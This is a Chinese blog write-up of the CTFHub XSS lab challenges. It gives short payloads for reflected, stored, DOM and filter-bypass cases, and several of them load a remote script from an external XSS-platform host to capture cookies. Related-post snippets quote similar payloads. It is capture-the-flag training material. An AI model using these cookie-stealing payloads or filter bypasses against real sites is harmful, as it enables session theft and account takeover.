CTFHub靶场:XSS

已于 2023-07-27 19:48:36 修改
阅读量330 收藏 4
点赞数 1
分类专栏: 渗透 文章标签: java 网络安全
于 2023-07-25 15:34:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/131914814
版权

目录

反射型

存储型

DOM反射

DOM跳转

过滤空格

过滤关键词

反射型

查看是否存在弹窗

<script>alert(1)</script>

 查看脚本

<sCRiPt sRC=//uj.ci/ijy></sCrIpT>

 输入网页地址+脚本

  查看cookie的flag

存储型

查看是否存在弹窗

 查看脚本

<sCRiPt sRC=//uj.ci/ijy></sCrIpT>

输入脚本

  查看cookie的flag

DOM反射

查看是否存在弹窗

</script><script>alert(1)</script>

 查看脚本

</script><sCRiPt sRC=//uj.ci/ijy></sCrIpT>

  查看cookie的flag

DOM跳转

检查是否存在弹窗,可以放在url地址栏上执行

?jumpto=javascript:alert(1)

放入脚本,使用$.getScript功能是异步加载并执行

?jumpto=javascript:$.getScript("//uj.ci/ijy")

  ​​​​​​​查看cookie的flag

 

过滤空格

查看是否存在弹窗

<script>alert(1)</script>

 

有空格,用/代替 (/**/)

<sCRiPt/sRC=//uj.ci/ijy></sCrIpT>

  ​​​​​​​查看cookie的flag

过滤关键词

测试是否弹窗 

<scrscriptipt>alert(1)</scrscriptipt>

 查看脚本

 输入脚本

<sCRiPt sRC=//uj.ci/ijy></sCrIpT>

 

 ​​​​​​​查看cookie的flag

Serein_NSQ
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全性XSS过滤器。
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
CTFHUB------XSS
qq_45616570的博客
06-23 719
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------XSS 反射型xss 题目 解题思路 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解题过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射型的变量值 4.返回题.
xss跨站攻击脚本概述
xu_1234567的博客
10-28 316
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久型跨站(存储型xss ):最直接的危害类型,跨站代码存储在服务器(数据库) (2)非持久型跨站(反射型xss):反射型跨站脚本漏洞,最普
CTFHub——XSS
最新发布
2302_79119987的博客
03-28 844
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHUB------XSS反射型(WP)
热门推荐
Y4tacker的博客
07-23 1万+
文章目录前言XSS测试平台 前言 一开始我直接在上面写js脚本发现出错,最后发现只能通过下面的输入框来执行XSS测试,于是我们只能用XSS测试平台解决问题 XSS测试平台 注册一个XSS测试平台 这里随便填写 勾选默认模块就够了,点击下一步 这时会出现一个找个将代码复制 拼接到网站后缀name后面,点击send 这时平台会收到一个记录点开即可 得到flag ...
CTFHUB-WEB-XSS-反射型
weixin_43486981的博客
08-13 3695
CTFHUB-WEB-XSS-反射型知识点:跨站脚本攻击XSS题目XSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 类型: DOM型。属于反射型的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储型。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射型。需要攻击者提前构造一个恶意链接来诱使客户点击。 防
CTF之旅(CTFHub技能树+详细Write up+已完结)(密码口令+XSS
weixin_51563603的博客
08-30 1514
目录其他CTFHub题目WriteUP地址前言密码口令弱口令 其他CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就分了几段写,大家见谅 1.web前置技能(已完结) 2.信息泄露(已完结) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意思,每个人有每个人的想法),后来也因为学业较忙且
调查:XSS攻击Web应用程序-研究论文
05-20
XSS攻击的类型为非持久(或反映)的XSS,持久(或存储的)XSS和基于DOM的漏洞。 跨站点脚本(XSS)漏洞的主要原因是无法清理植入网页中的用户输入。 尽管采用了安全的编码技术并使用了漏洞检测工具,但XSS仍保留在...
xsstry:xss漏洞利用平台
06-10
xsstry xss 漏洞利用平台 xss 漏洞利用平台
XSS-Payloads:XSS矢量列表
04-28
XSS有效负载自2015年以来,我一直在从网站,推文,书籍等不同资源中收集XSS矢量/有效载荷清单。 您可以使用它们绕过WAF并查找XSS漏洞,我将尝试尽可能地更新列表。 我收集了大多数文章,并且他们有真正的作者,我不...
CTFHub XSS 过滤关键词 WriteUp
柠檬i的博客
07-05 750
绕过xss关键词过滤,双写绕过和大小写绕过是比较常见的方式
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3159
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
CTFHub技能树web之XSS
wzhwzh123321的博客
02-26 1196
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4886
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
CTFHub靶场————XSS
qq_61579604的博客
10-17 215
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
ctfhubxss
小宇的web博客
05-22 1617
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
XSS平台 XSS挑战之旅 解题记录 writeup
Senimo
08-03 1698
XSS平台 XSS挑战之旅 解题记录 writeuplevel1level2level3level4level5level6level7level8level9level10level11level12level13 XSS挑战之旅是一个练习简单XSS脚本注入的平台,通过检测弹窗判断用户是否通关。 但前几关存在bug,只要在网页源码图片链接处插入JavaScript代码即可产生弹窗,达到通关的...
ctfhub技能树xss
07-28
CTFHub的技能树中有关于XSS(跨站脚本攻击)的内容。XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本来攻击用户浏览器,从而窃取用户信息或者进行其他恶意操作。在CTFHubXSS技能树中,你可以学习到以下内容: 1. XSS基础知识:了解XSS的概念、分类和原理。 2. XSS攻击类型:学习常见的XSS攻击类型,包括反射型、存储型和DOM型XSS。 3. XSS攻击场景:了解XSS攻击在不同的Web应用场景中的实践方法,如评论框、搜索框等。 4. XSS防御措施:学习如何预防和防御XSS攻击,包括输入过滤、输出编码和内容安全策略等。 5. XSS挑战与实战:通过CTF题目和实际场景模拟,提升对XSS漏洞的发现和利用能力。 请注意,这只是CTFHub技能树中关于XSS的一部分内容,更详细的内容需要你自己去学习和探索。祝你学习愉快!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值